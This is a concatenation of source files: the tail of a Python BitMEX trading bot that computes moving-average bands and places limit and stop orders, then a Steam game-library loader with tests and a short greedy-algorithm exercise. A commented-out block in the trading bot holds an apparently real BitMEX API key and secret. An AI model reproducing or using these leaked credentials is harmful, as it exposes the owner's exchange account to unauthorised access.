ExponentialMovingAverageNode(Node[ExponentialMovingAverageNodeConfig, ExponentialMovingAverageResult]):\n __slots__ = ('a', 'n', 'count', 'mean', 'variance', 'values', 'sma_sum')\n\n def __init__(self, engine: 'Engine', config: ExponentialMovingAverageNodeConfig) -> None:\n super().__init__(engine, config)\n self.a = 1 - config.alpha\n self.n = math.ceil((2 / config.alpha) - 1)\n self.count = 0\n self.mean: Optional[float] = None\n self.variance = 0.\n self.values: deque[NRT] = deque(maxlen=config.sma_lookback)\n self.sma_sum = 0.\n engine.subscribe_node_result(config.node_config, self.handle_value)\n\n def handle_value(self, hacky_value: HackyMcHackface) -> None:\n value = hacky_value.midpoint_price\n self.count += 1\n if self.count == 1:\n assert self.mean is None\n self.mean = value\n else:\n assert self.mean is not None\n # See .\n delta = value - self.mean\n increment = self.config.alpha * delta\n self.mean += increment\n self.variance = self.a * (self.variance + (delta * increment))\n\n if len(self.values) == self.values.maxlen:\n self.sma_sum -= self.values[0]\n self.values.append(value)\n self.sma_sum += value\n\n if self.count >= self.n and self.count >= self.config.sma_lookback:\n sma_mean = self.sma_sum / self.config.sma_lookback\n sma_variance = sum((value - sma_mean) ** 2 for value in self.values) / (self.config.sma_lookback - 1)\n self.publish_result(ExponentialMovingAverageResult(current_value=value, best_bid=hacky_value.best_bid, best_ask=hacky_value.best_ask, mean=self.mean, variance=self.variance, sma_mean=sma_mean, sma_variance=sma_variance))\n\n\n########################################################################################################################\n# Engine\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass EngineConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('symbol', 'base_currency', 'quote_currency', 'account_currency', 'settlement_currency', 'leverage', 'position_currency')\n\n # Ticker symbol.\n symbol: str\n # Base currency symbol.\n base_currency: str\n # Quote currency symbol.\n quote_currency: str\n # Account currency symbol. When orders are executed, we spend or receive from this wallet.\n account_currency: str\n # Settlement currency symbol. When orders are executed, we spend or receive in this currency.\n settlement_currency: str\n # Leverage ratio, for margin trading.\n leverage: float\n # Position currency symbol. 
When orders are executed, our position in this currency changes.\n position_currency: str\n\n def __post_init__(self) -> None:\n assert_ticker_basic_symbol(self.symbol)\n assert_ticker_basic_symbol(self.base_currency)\n assert_ticker_basic_symbol(self.quote_currency)\n assert f'{self.base_currency}{self.quote_currency}' == self.symbol\n assert_ticker_extended_symbol(self.account_currency)\n assert_ticker_extended_symbol(self.settlement_currency)\n assert self.settlement_currency.upper() == self.quote_currency\n assert self.settlement_currency == self.account_currency\n assert_non_diminishing_multiplier(self.leverage)\n assert_ticker_basic_symbol(self.position_currency)\n assert self.position_currency == self.base_currency\n\n\nclass Engine:\n __slots__ = ('config', 'loop', 'l2_order_book_tick_queue', 'node_type_registry', 'node_registry', 'node_subscriptions')\n\n def __init__(self, config: EngineConfig) -> None:\n self.config = config\n self.loop = asyncio.get_event_loop()\n self.l2_order_book_tick_queue: asyncio.Queue[L2OrderBookTick] = asyncio.Queue()\n self.node_type_registry: dict[type[Any], type[Node]] = {}\n self.node_registry: dict[Any, Node] = {}\n self.node_subscriptions: dict[Node, set[Callable[[Any], None]]] = defaultdict(set)\n\n self.register_node_type(TimerNodeConfig, TimerNode)\n self.register_node_type(L2OrderBookTickNodeConfig, L2OrderBookTickNode)\n self.register_node_type(DiscretisedL2OrderBookTickNodeConfig, DiscretisedL2OrderBookTickNode)\n self.register_node_type(MidpointPriceNodeConfig, MidpointPriceNode)\n self.register_node_type(ExponentialMovingAverageNodeConfig, ExponentialMovingAverageNode)\n\n def register_node_type(self, config_cls: type[NCT], node_cls: type[Node[NCT, Any]]) -> None:\n assert config_cls not in self.node_type_registry, f'Cannot register {config_cls} to {node_cls} as it is already registered to {self.node_type_registry[config_cls]}'\n logger.debug(f'Registering {config_cls} to {node_cls}.')\n self.node_type_registry[config_cls] = node_cls\n\n def get_node(self, config: NCT) -> Node[NCT, Any]:\n config_cls = type(config)\n assert config_cls in self.node_type_registry, f'Cannot get node for {config} as {config_cls} is not registered'\n if config in self.node_registry:\n logger.debug(f'Returning existing node for {config}.')\n return self.node_registry[config]\n else:\n logger.info(f'Creating new node for {config}.')\n node_cls = self.node_type_registry[config_cls]\n node = node_cls(self, config)\n self.node_registry[config] = node\n return node\n\n def subscribe_node_result(self, config: NCT, handler: Callable[[NRT], None]) -> None:\n node = self.get_node(config)\n handlers = self.node_subscriptions[node]\n if handler in handlers:\n logger.warning(f'{handler} is already subscribed to node for {config}!')\n else:\n logger.info(f'Subscribing {handler} to node for {config}.')\n handlers.add(handler)\n\n def publish_node_result(self, node: Node[Any, NRT], result: NRT) -> None:\n for handler in self.node_subscriptions[node]:\n logger.debug(f'Scheduling callback to {handler} with {result}.')\n self.loop.call_soon(handler, result)\n\n def run(self) -> None:\n self.loop.run_forever()\n\n\n########################################################################################################################\n# Exchange\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass BitmexExchangeConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 
3.10.\n __slots__ = ('is_live', 'api_key', 'api_secret')\n\n # `True` if we're trading on the live exchange, otherwise `False` if we're trading on the simulated exchange.\n is_live: bool\n # BitMEX API key ID.\n api_key: str\n # BitMEX API key secret.\n api_secret: str\n\n def __post_init__(self) -> None:\n assert_bool(self.is_live)\n assert_base64url(self.api_key)\n assert_base64url(self.api_secret)\n\n\nclass BitmexExchange:\n __slots__ = ('client', 'ws')\n\n def __init__(self, engine: Engine, config: BitmexExchangeConfig) -> None:\n self.client = bitmex.bitmex(\n test=not config.is_live,\n api_key=config.api_key,\n api_secret=config.api_secret,\n )\n\n def l2_order_book_tick_queue_putter(tick: L2OrderBookTick):\n \"\"\"\n This func is assigned to self.ws.l2_order_book_tick_queue_putter so\n data passed to engine\n \"\"\"\n engine.loop.call_soon_threadsafe(engine.l2_order_book_tick_queue.put_nowait, tick)\n\n def connect() -> None:\n self.ws = BitmexWebsocketEx(\n engine_config=engine.config,\n l2_order_book_tick_queue_putter=l2_order_book_tick_queue_putter,\n on_close=reconnect,\n endpoint=f'''wss://ws.{'' if config.is_live else 'testnet.'}bitmex.com/realtime''',\n symbol=engine.config.symbol,\n api_key=config.api_key,\n api_secret=config.api_secret,\n subscriptions=(\n 'instrument',\n 'orderBookL2',\n 'quote',\n 'trade',\n 'execution',\n 'order',\n 'margin',\n 'position',\n 'wallet',\n )\n )\n\n def reconnect() -> None:\n logger.warning('Websocket closed! Will reconnect.')\n connect()\n\n connect()\n\n\nclass BitmexWebsocketEx(BitMEXWebsocket):\n __slots__ = ('engine_config', 'l2_order_book_tick_queue_putter', 'on_close')\n\n def __init__(self, engine_config: EngineConfig, l2_order_book_tick_queue_putter: Callable[[L2OrderBookTick], None], on_close: Callable[[], None], *args, **kwargs) -> None:\n self.engine_config = engine_config\n self.l2_order_book_tick_queue_putter = l2_order_book_tick_queue_putter\n self.on_close = on_close\n super().__init__(*args, **kwargs)\n\n def _BitMEXWebsocket__on_message(self, message: str) -> None:\n monotonic_timestamp_ns = time.monotonic_ns()\n super()._BitMEXWebsocket__on_message(message)\n deserialised_message = json.loads(message) # TODO: Avoid double deserialisation.\n if deserialised_message.get('action'):\n table = deserialised_message.get('table')\n if table == 'orderBookL2':\n self.__put_l2_order_book_tick_exchange_event(monotonic_timestamp_ns)\n\n def _BitMEXWebsocket__on_close(self) -> None:\n super()._BitMEXWebsocket__on_close()\n self.on_close()\n\n def __put_l2_order_book_tick_exchange_event(self, monotonic_timestamp_ns: int) -> None:\n data = self.data['orderBookL2']\n bids = sorted((\n OrderBookLevel(price=datum['price'], volume=datum['size'])\n for datum in data\n if datum['symbol'] == self.engine_config.symbol and datum['side'] == 'Buy'\n ), reverse=True)\n asks = sorted((\n OrderBookLevel(price=datum['price'], volume=datum['size'])\n for datum in data\n if datum['symbol'] == self.engine_config.symbol and datum['side'] == 'Sell'\n ))\n midpoint_price = (bids[0].price + asks[0].price) / 2\n l2_order_book_tick = L2OrderBookTick(\n monotonic_timestamp_ns=monotonic_timestamp_ns,\n midpoint_price=midpoint_price,\n bids=bids,\n asks=asks,\n )\n self.l2_order_book_tick_queue_putter(l2_order_book_tick)\n\n\n########################################################################################################################\n# 
Strategy\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass MomentumIndicatorResult:\n __slots__ = ('midpoint_price', 'best_bid', 'best_ask', 'momentum', 'significance', 'sma_variance', 'upper', 'lower', 'upper1', 'lower1')\n\n midpoint_price: float\n best_bid: Optional[float]\n best_ask: Optional[float]\n momentum: float\n significance: float\n sma_variance: float\n upper: float\n lower: float\n upper1: float\n lower1: float\n\n\n@dataclass(frozen=True)\nclass MomentumIndicatorNodeConfig:\n __slots__ = ('half_life', 'Multiplier')\n\n half_life: int\n Multiplier: float\n\n def __post_init__(self) -> None:\n assert_positive_integer(self.half_life)\n\n\nclass MomentumIndicatorNode(Node[MomentumIndicatorNodeConfig, MomentumIndicatorResult]):\n __slots__ = ('magic_constant',)\n\n def __init__(self, engine: 'Engine', config: MomentumIndicatorNodeConfig) -> None:\n super().__init__(engine, config)\n self.magic_constant = 2 * math.log(2) / config.half_life\n l2_order_book_tick_node_config = DiscretisedL2OrderBookTickNodeConfig(duration=120.)\n mpp_node_config = MidpointPriceNodeConfig(l2_order_book_tick_node_config=l2_order_book_tick_node_config)\n alpha = 2 / (config.half_life + 1)\n ema_node_config = ExponentialMovingAverageNodeConfig(node_config=mpp_node_config, alpha=alpha, sma_lookback=config.half_life)\n engine.subscribe_node_result(ema_node_config, self.handle_ema_result)\n\n def handle_ema_result(self, ema_result: ExponentialMovingAverageResult) -> None:\n upper = ema_result.sma_mean + self.config.Multiplier * math.sqrt(ema_result.sma_variance)\n lower = ema_result.sma_mean - self.config.Multiplier * math.sqrt(ema_result.sma_variance)\n upper1 = ema_result.sma_mean + 1.9 * math.sqrt(ema_result.sma_variance)\n lower1 = ema_result.sma_mean - 1.9 * math.sqrt(ema_result.sma_variance)\n significance = abs((ema_result.current_value - ema_result.sma_mean) / math.sqrt(ema_result.sma_variance)) if ema_result.sma_variance != 0 else 0\n sma_variance = ema_result.sma_variance\n self.publish_result(MomentumIndicatorResult(midpoint_price=ema_result.current_value, best_bid=ema_result.best_bid, best_ask=ema_result.best_ask, momentum=-1000,\n significance=significance, sma_variance=sma_variance, upper=upper, lower=lower, upper1=upper1, lower1=lower1))\n\n\n@dataclass(frozen=True)\nclass WindowedPairNodeConfig:\n __slots__ = ('node_config', 'n', 'n2')\n\n node_config: Any\n n: int\n n2: int\n\n def __post_init__(self):\n assert_positive_integer(self.n)\n assert_positive_integer(self.n2)\n\n\nclass WindowedPairNode(Node[WindowedPairNodeConfig, tuple[NRT, NRT]]):\n __slots__ = ('values',)\n\n def __init__(self, engine: 'Engine', config: WindowedPairNodeConfig) -> None:\n super().__init__(engine, config)\n assert config.n2 > config.n\n self.values: deque[NRT] = deque(maxlen=config.n2)\n engine.subscribe_node_result(config.node_config, self.handle_value)\n\n def handle_value(self, value: NRT):\n self.values.append(value)\n if len(self.values) == self.values.maxlen:\n self.publish_result((value, self.values[self.values.maxlen - self.config.n], self.values[0]))\n\n\n################################################################################\n# execution dirty workaround config\n################################################################################\n# MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD = 2.1\n# VARIANCE_THERESHOLD = 1.8\n# Multiplier = 2.1\n\n# symbol0 = 'LTCUSDT'\n# ordType0 = 'Limit'\n# 
StopLoss = 0.02\n# orderQty0 = 12000\n# bitmex_api_key = 'ajdbjr4a_OyzPotZQqxkJW47'\n# bitmex_api_secret = '_P4Av8fzRxA1w4moGPwylXFGvYwe_hNpvqZROB_Fu5pCJGky'\n# client = bitmex.bitmex(test=False, api_key=bitmex_api_key, api_secret=bitmex_api_secret)\n################################################################################\n\n@dataclass\nclass MomentumIndicatorHistory:\n history: list[MomentumIndicatorResult]\n timestamps: list[float]\n\n def record(self, momentum_indicator_result: MomentumIndicatorResult) -> int:\n self.history.append(momentum_indicator_result)\n self.timestamps.append(time.time())\n return len(self.history) - 1\n\n def query_history_upper_or_lower(self, start_index: int, end_index: int = -1) -> Optional[bool]:\n for cur_index in range(start_index, end_index, -1):\n momentum: MomentumIndicatorResult = self.history[cur_index]\n if momentum.midpoint_price > momentum.upper1:\n return True\n elif momentum.midpoint_price < momentum.lower1:\n return False\n return None\n\n\n@dataclass(frozen=True)\nclass MomentumSignalNodeConfig:\n __slots__ = ('half_life', 'threshold', 'MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD', 'VARIANCE_THERESHOLD',\n 'Multiplier', 'symbol0', 'ordType0', 'StopLoss', 'orderQty0', 'bitmex_api_key', 'bitmex_api_secret',\n 'is_live')\n\n half_life: int\n threshold: float\n\n MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD: float\n VARIANCE_THERESHOLD: float\n Multiplier: float\n\n symbol0: str\n ordType0: str\n StopLoss: float\n orderQty0: int\n bitmex_api_key: str\n bitmex_api_secret: str\n is_live: bool\n\n def __post_init__(self):\n assert_positive_integer(self.half_life)\n assert_positive_real(self.threshold)\n\n\nclass MomentumSignalNode(Node[MomentumSignalNodeConfig, Signal]):\n __slots__ = ('client', 'tracking_map', 'history', 'last_query_index')\n\n def __init__(self, engine: 'Engine', config: MomentumSignalNodeConfig) -> None:\n super().__init__(engine, config)\n self.client = bitmex.bitmex(test=not config.is_live, api_key=config.bitmex_api_key, api_secret=config.bitmex_api_secret)\n\n momentum_indicator_node_config = MomentumIndicatorNodeConfig(half_life=config.half_life, Multiplier=config.Multiplier)\n windowed_pair_node_config = WindowedPairNodeConfig(node_config=momentum_indicator_node_config, n=2, n2=config.half_life + 1)\n engine.subscribe_node_result(windowed_pair_node_config, self.handle_momenta)\n self.tracking_map: OrderedDict[str, str] = OrderedDict()\n self.history = MomentumIndicatorHistory([], [])\n self.last_query_index = -1\n\n def handle_momenta(self, momenta: tuple[MomentumIndicatorResult, MomentumIndicatorResult, MomentumIndicatorResult]):\n (current_momentum, previous_momentum, really_previous_momentum) = momenta\n # record history\n record_index = self.history.record(current_momentum)\n momentum = (current_momentum.momentum / previous_momentum.momentum) if previous_momentum.momentum != 0 else 0\n varRatio = (current_momentum.sma_variance) / (really_previous_momentum.sma_variance) if really_previous_momentum.sma_variance != 0 else 0\n partial_message = f'[Current (MPP, upper, lower, significance, varRatio) is ({current_momentum.midpoint_price}, {current_momentum.upper}, {current_momentum.lower}, {current_momentum.significance}, {varRatio}).]'\n # if not (current_momentum.significance > MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD and previous_momentum.significance > MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD):\n positions = self.client.Position.Position_get(filter=json.dumps({'symbol': self.config.symbol0})).result()[0] # to get 'isOpen', 
'currentQty'\n positions = positions[0] if len(positions) > 0 else {'currentQty': 0}\n\n if current_momentum.midpoint_price < current_momentum.lower:\n if (current_momentum.significance > self.config.MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD and varRatio < self.config.VARIANCE_THERESHOLD):\n logger.info(f'{partial_message}: BUY signal!')\n self.publish_result(Signal.BUY)\n signal = Signal.BUY\n if positions['currentQty'] == 0:\n # CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_bid).result()\n StopBuy = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_bid * (1 - self.config.StopLoss), 1), execInst='LastPrice').result()\n self.cancel_by_status(NewOrder)\n\n self.place_order(StopBuy[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Buy order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n\n elif positions['currentQty'] < 0:\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-positions['currentQty'] + signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_bid).result()\n StopBuy = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_bid * (1 - self.config.StopLoss), 1), execInst='LastPrice').result()\n\n self.place_order(StopBuy[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Buy order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n elif positions['currentQty'] < 0:\n logger.info(f'{partial_message}: CLOSE signal!')\n Closeposition = self.client.Order.Order_closePosition(symbol=self.config.symbol0, price=current_momentum.best_bid).result()\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n\n elif current_momentum.midpoint_price > current_momentum.upper:\n if (current_momentum.significance > self.config.MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD and varRatio < self.config.VARIANCE_THERESHOLD):\n logger.info(f'{partial_message}: SELL signal!')\n self.publish_result(Signal.SELL)\n signal = Signal.SELL\n if positions['currentQty'] == 0:\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_ask).result()\n StopSell = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_ask * (1 + self.config.StopLoss), 1), execInst='LastPrice').result()\n\n self.place_order(StopSell[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Sell order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n\n elif positions['currentQty'] > 0:\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-positions['currentQty'] + signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_ask).result()\n StopSell = 
self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_ask * (1 + self.config.StopLoss), 1), execInst='LastPrice').result()\n\n self.place_order(StopSell[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Sell order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n elif positions['currentQty'] > 0:\n logger.info(f'{partial_message}: CLOSE signal!')\n Closeposition = self.client.Order.Order_closePosition(symbol=self.config.symbol0, price=current_momentum.best_ask).result()\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n\n elif current_momentum.lower1 <= current_momentum.midpoint_price <= current_momentum.upper1:\n logger.info(f'{partial_message}: midpoint is between lower1 and upper1!' +\n f'[midpoint:{current_momentum.midpoint_price},lower1:{current_momentum.lower1},upper1:{current_momentum.upper1}]')\n is_upper = self.history.query_history_upper_or_lower(record_index - 1, self.last_query_index)\n self.last_query_index = record_index - 1\n if is_upper is not None:\n # cancel buy\n if is_upper:\n logger.info(f'{partial_message}: The midpoint price dropped from above upper1 to below upper1. Cancelling BUY orders.')\n self.cancel_by_symbol(self.config.symbol0, orderQty=Signal.BUY * self.config.orderQty0, ordType=self.config.ordType0)\n # cancel sell\n else:\n logger.info(f'{partial_message}: The midpoint price rose from below lower1 to above lower1. Cancelling SELL orders.')\n self.cancel_by_symbol(self.config.symbol0, orderQty=Signal.SELL * self.config.orderQty0, ordType=self.config.ordType0)\n else:\n logger.info(f'{partial_message}: Historical midpoint prices are all between lower1 and upper1. 
There\\'s no need to cancel orders.')\n\n else:\n logger.info(f'{partial_message}: No signal (price within threshold).')\n return\n\n def cancel_by_status(self, order):\n if self.client.Order.Order_getOrders(filter=json.dumps({'orderID': order[0]['orderID']})).result()[0][0]['ordStatus'] == 'Filled':\n self.cancel_by_symbol(order[0]['symbol'], orderQty=order[0]['orderQty'], ordType=order[0]['ordType'])\n print(f'previous Stop orders for {order[0][\"side\"]} Limit orders canceled')\n\n def cancel_by_symbol(self, symbol_in: str, **filter_dict) -> list:\n filter_dict['open'] = True\n orders, resp = self.client.Order.Order_getOrders(symbol=symbol_in, filter=json.dumps(filter_dict)).result()\n if isinstance(orders, list):\n if len(orders) == 0:\n logger.warning('No order should be cancel')\n return []\n order_ids = []\n for order in orders:\n order_ids.append(order['orderID'])\n order_ids += self.get_associated_order_id(order['orderID'])\n cancelled = self.client.Order.Order_cancel(orderID=json.dumps(order_ids)).result()[0]\n logger.info('Cancel orders success')\n return cancelled\n else:\n logger.error(f'Query order before cancel failed.{filter_dict}')\n\n def place_order(self, associated_order_id: str, man_order_id: str):\n \"\"\"\n\n :param associated_order_id: stop order id\n :param man_order_id: main order id\n :return:\n \"\"\"\n self.tracking_map[associated_order_id] = man_order_id\n\n def remove_associated_orders_belongs_to_main_order_id(self, main_order_id: str):\n for (k, v) in self.tracking_map.items():\n if v == main_order_id:\n self.tracking_map[k] = 'FINISHED'\n\n def is_order_already_associated(self, associated_order_id: str) -> bool:\n return associated_order_id in self.tracking_map\n\n def get_main_order_id(self, associated_order_id: str) -> str:\n return self.tracking_map.get(associated_order_id)\n\n def get_associated_order_id(self, main_order_id: str) -> list[str]:\n ret: list[str] = []\n for (k, v) in self.tracking_map.items():\n if v == main_order_id:\n ret.append(k)\n return ret\n\n\n@dataclass(frozen=True)\nclass MomentumStrategyConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('half_life', 'threshold', 'per_trade_usage', 'signal_execute_config')\n\n # Look-back duration (in seconds).\n half_life: int\n # Ratio of current momentum to look-back momentum above which a buy or sell signal may be emitted.\n threshold: float\n # Percentage of available balance (including margin) to use when a buy or sell signal is emitted.\n per_trade_usage: float\n\n signal_execute_config: dict[str, int | str | bool]\n\n def __post_init__(self) -> None:\n assert_positive_integer(self.half_life)\n assert_positive_real(self.threshold)\n assert_positive_percentage(self.per_trade_usage)\n\n\nclass MomentumStrategy:\n __slots__ = ()\n\n def __init__(self, engine: Engine, config: MomentumStrategyConfig) -> None:\n engine.register_node_type(MomentumIndicatorNodeConfig, MomentumIndicatorNode)\n engine.register_node_type(WindowedPairNodeConfig, WindowedPairNode)\n engine.register_node_type(MomentumSignalNodeConfig, MomentumSignalNode)\n\n signal_execute_config = config.signal_execute_config\n signal_execute_config.update(half_life=config.half_life, threshold=config.threshold)\n engine.get_node(MomentumSignalNodeConfig(**signal_execute_config)) # TODO\n\n\n########################################################################################################################\n# 
Execution\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass WorkTheBidExecutionConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('max_depth', 'min_trade_lots', 'order_ratio', 'renew_after_duration', 'renew_after_trade_lots')\n\n # Maximum order book depth (in levels) to which orders can be placed.\n max_depth: int\n # Minimum trade size (in lots) per level.\n min_trade_lots: int\n # Target percentage of volume at the level the order will be placed. This will be rounded down to the nearest lot.\n # This may then be adjusted up to the minimum trade size, or down if we're on our last order.\n order_ratio: float\n # Duration (in seconds) that can elapse with an order not being completely fulfilled, after which all open orders\n # will be re-evaluated.\n renew_after_duration: float\n # Volume of trades (in lots) that can elapse with an order not being completely fulfilled, after which all open\n # orders will be re-evaluated.\n renew_after_trade_lots: int\n\n def __post_init__(self) -> None:\n assert_positive_integer(self.max_depth)\n assert_positive_integer(self.min_trade_lots)\n assert_positive_percentage(self.order_ratio)\n assert_positive_real(self.renew_after_duration)\n assert_positive_integer(self.renew_after_trade_lots)\n\n\n########################################################################################################################\n# Bootstrap\n########################################################################################################################\n\ndef main() -> None:\n (verbosity, log_file, engine_config, exchange_config, strategy_config, execution_config) = get_config()\n init_logging(verbosity, log_file)\n\n engine = Engine(engine_config)\n exchange = BitmexExchange(engine, exchange_config)\n strategy = MomentumStrategy(engine, strategy_config)\n engine.run()\n\n\ndef get_config() -> tuple[int, Optional[Path], EngineConfig, BitmexExchangeConfig, MomentumStrategyConfig, WorkTheBidExecutionConfig]:\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', nargs='?', default='config.json', type=argparse.FileType('r'))\n parser.add_argument('--verbose', '-v', action='count', default=0, dest='verbosity')\n parser.add_argument('--log-file', nargs='?', default='record.log', type=Path) # output log content to ./record.log by default\n args = parser.parse_args()\n\n config = json.load(args.config)\n engine_config = EngineConfig(\n symbol=config['symbol'],\n base_currency=config['baseCurrency'],\n quote_currency=config['quoteCurrency'],\n account_currency=config['accountCurrency'],\n settlement_currency=config['settlementCurrency'],\n leverage=config['leverage'],\n position_currency=config['positionCurrency'],\n )\n exchange_config = BitmexExchangeConfig(\n is_live=config['exchange']['isLive'],\n api_key=config['exchange']['apiKey'],\n api_secret=getpass(f'''Enter BitMEX API key secret (for ID `{config['exchange']['apiKey']}`): ''') # ask for secret input from terminal\n # api_secret=config['exchange']['apiSecret']\n )\n strategy_config = MomentumStrategyConfig(\n half_life=config['strategy']['halfLife'],\n threshold=config['strategy']['threshold'],\n per_trade_usage=config['strategy']['perTradeUsage'],\n signal_execute_config=config['strategy']['signal_execute_config'],\n )\n execution_config = WorkTheBidExecutionConfig(\n max_depth=config['execution']['maxDepth'],\n 
min_trade_lots=config['execution']['minTradeLots'],\n order_ratio=config['execution']['orderRatio'],\n renew_after_duration=config['execution']['renewAfterDuration'],\n renew_after_trade_lots=config['execution']['renewAfterTradeLots'],\n )\n\n verbosity = assert_non_negative_integer(args.verbosity)\n return (verbosity, args.log_file, engine_config, exchange_config, strategy_config, execution_config)\n\n\ndef init_logging(verbosity: int, log_file: Optional[Path]) -> None:\n formatter = logging.Formatter('[{asctime}] [{levelname:<8s}] [{threadName:s}] [{funcName:s}]: {message:s}', style='{')\n\n root_stream_handler = logging.StreamHandler()\n root_stream_handler.setLevel(logging.DEBUG)\n root_stream_handler.setFormatter(formatter)\n\n if log_file:\n root_file_handler = logging.FileHandler(filename=log_file, mode='a', encoding='utf-8')\n root_file_handler.setLevel(logging.DEBUG)\n root_file_handler.setFormatter(formatter)\n\n # By default, log `WARNING`s and higher.\n # If `-v`, log `INFO`s and higher.\n # If `-vv`, log everything for the core application, and `INFO`s and higher for everything else.\n # If `-vvv`, log everything.\n logger.setLevel(logging.DEBUG if verbosity == 2 else logging.NOTSET)\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG if verbosity >= 3 else logging.INFO if verbosity >= 1 else logging.WARNING)\n root_logger.addHandler(root_stream_handler)\n if log_file:\n root_logger.addHandler(root_file_handler)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LeoJhonSong/bitmex-quant","sub_path":"MeanReversionLimitClose.py","file_name":"MeanReversionLimitClose.py","file_ext":"py","file_size_in_byte":43401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14580503614","text":"from unittest import TestCase\nfrom picker_lib import Distributor\nfrom steam import WebAPI\n\n\nclass Steam(Distributor):\n def __init__(self):\n super().__init__()\n self.steam_id = 0\n self.setup_connection()\n\n def setup_connection(self):\n self.api = WebAPI(key=self.credentials['web_api_key'])\n data = self.api.ISteamUser.ResolveVanityURL(\n vanityurl=self.credentials['user_id']\n )\n self.steam_id = data['response']['steamid']\n self.connection_alive = True\n\n def load_library_with_games(self):\n if self.connection_alive:\n self.library.games = {}\n # web call: get list of games, and their played status\n data = self.api.IPlayerService.GetOwnedGames(\n steamid=self.steam_id,\n include_appinfo=1,\n include_played_free_games=1,\n appids_filter=None\n )\n steam_game_list = data['response']['games']\n for game in steam_game_list:\n self.add_game(game['name'], True if game['playtime_forever'] > 0 else False)\n\n\nclass SteamDistributorTests(TestCase):\n @classmethod\n def setUpClass(cls):\n import warnings\n warnings.filterwarnings('ignore', 'unclosed*', ResourceWarning)\n\n def setUp(self):\n self.stm = Steam()\n\n def test_created_steam_obj(self):\n self.assertEqual('steam', self.stm.name)\n\n def test_check_connection_and_get_steam_id(self):\n self.assertEqual(True, self.stm.connection_alive)\n self.assertIsNot(0, self.stm.steam_id)\n\n def test_load_library(self):\n self.assertEqual(0, len(self.stm.get_titles_from_library()))\n self.stm.load_library_with_games()\n self.assertIsNot(0, 
len(self.stm.get_titles_from_library()))\n","repo_name":"chisaipete/gamepicker","sub_path":"dist_steam.py","file_name":"dist_steam.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"13873512499","text":"import sys\r\n\r\nN, M, K = map(int, input().split())\r\narr = list(map(int, sys.stdin.readline().split()))\r\n\r\nresult = 0\r\ntotalSum = 0\r\narr.sort(reverse=True)\r\n\r\n#sol1\r\nwhile M > totalSum:\r\n r = 0\r\n while K > r and M > totalSum:\r\n result += arr[0]\r\n totalSum+=1\r\n r +=1\r\n\r\n if totalSum >= M: # guard: stop once all M picks are used, otherwise the next add overshoots\r\n break\r\n result += arr[1]\r\n totalSum+=1\r\n\r\nprint(result)\r\n\r\n#sol2\r\nresult = 0\r\nfirst = arr[0]\r\nsecond = arr[1]\r\n\r\ncount = (M // (K+1)) * K # integer arithmetic avoids float rounding errors for large M\r\ncount += M % (K+1)\r\n\r\nresult += count * first\r\nresult += (M-count) * second\r\n\r\nprint(result)\r\n\r\n\r\n\r\n\r\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"그리디/큰수의법칙.py","file_name":"큰수의법칙.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
